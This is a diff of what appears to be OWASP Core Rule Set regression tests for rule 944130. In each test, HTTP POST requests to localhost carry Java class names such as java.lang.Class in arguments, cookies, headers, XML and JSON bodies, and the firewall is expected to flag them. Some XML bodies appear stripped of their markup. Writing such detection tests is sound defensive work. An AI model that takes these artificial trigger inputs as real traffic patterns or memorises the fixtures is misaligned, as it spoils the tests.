method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-259 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.StringReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 259 desc: "XML attribute value includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-260 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 260 desc: "XML element value includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.StringReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-261 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.StringReader" + output: + log: + expect_ids: [944130] + - test_id: 261 desc: "Nested XML element value includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.StringReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-262 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.StringReader" + output: + log: + expect_ids: [944130] + - test_id: 262 desc: "Content-Type text/plain includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.StringReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-263 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.StringReader" + output: + log: + expect_ids: [944130] + - test_id: 263 desc: "Content-Type application/json arg value includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.StringReader\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-264 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.StringReader\"}" + output: + log: + expect_ids: [944130] + - test_id: 264 desc: "Content-Type application/json arg name includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.StringReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-265 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.StringReader\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 265 desc: "Argument test includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Class" - output: - log_contains: "id \"944130\"" - - test_title: 944130-266 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Class" + output: + log: + expect_ids: [944130] + - test_id: 266 desc: "Argument name includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Class=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-267 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Class=test" + output: + log: + expect_ids: [944130] + - test_id: 267 desc: "Cookie test includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.Class - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-268 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Class + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 268 desc: "Cookie name includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.Class=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-269 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Class=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 269 desc: "Request header test includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.Class - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-270 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Class + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 270 desc: "XML attribute value includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-271 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 271 desc: "XML element value includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Class" - output: - log_contains: "id \"944130\"" - - test_title: 944130-272 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Class" + output: + log: + expect_ids: [944130] + - test_id: 272 desc: "Nested XML element value includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Class" - output: - log_contains: "id \"944130\"" - - test_title: 944130-273 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Class" + output: + log: + expect_ids: [944130] + - test_id: 273 desc: "Content-Type text/plain includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Class" - output: - log_contains: "id \"944130\"" - - test_title: 944130-274 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Class" + output: + log: + expect_ids: [944130] + - test_id: 274 desc: "Content-Type application/json arg value includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.Class\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-275 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Class\"}" + output: + log: + expect_ids: [944130] + - test_id: 275 desc: "Content-Type application/json arg name includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.Class\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-276 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.Class\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 276 desc: "Argument test includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Integer" - output: - log_contains: "id \"944130\"" - - test_title: 944130-277 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Integer" + output: + log: + expect_ids: [944130] + - test_id: 277 desc: "Argument name includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Integer=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-278 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Integer=test" + output: + log: + expect_ids: [944130] + - test_id: 278 desc: "Cookie test includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.Integer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-279 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Integer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 279 desc: "Cookie name includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.Integer=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-280 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Integer=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 280 desc: "Request header test includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.Integer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-281 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Integer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 281 desc: "XML attribute value includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-282 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 282 desc: "XML element value includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Integer" - output: - log_contains: "id \"944130\"" - - test_title: 944130-283 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Integer" + output: + log: + expect_ids: [944130] + - test_id: 283 desc: "Nested XML element value includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Integer" - output: - log_contains: "id \"944130\"" - - test_title: 944130-284 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Integer" + output: + log: + expect_ids: [944130] + - test_id: 284 desc: "Content-Type text/plain includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Integer" - output: - log_contains: "id \"944130\"" - - test_title: 944130-285 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Integer" + output: + log: + expect_ids: [944130] + - test_id: 285 desc: "Content-Type application/json arg value includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.Integer\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-286 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Integer\"}" + output: + log: + expect_ids: [944130] + - test_id: 286 desc: "Content-Type application/json arg name includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.Integer\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-287 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 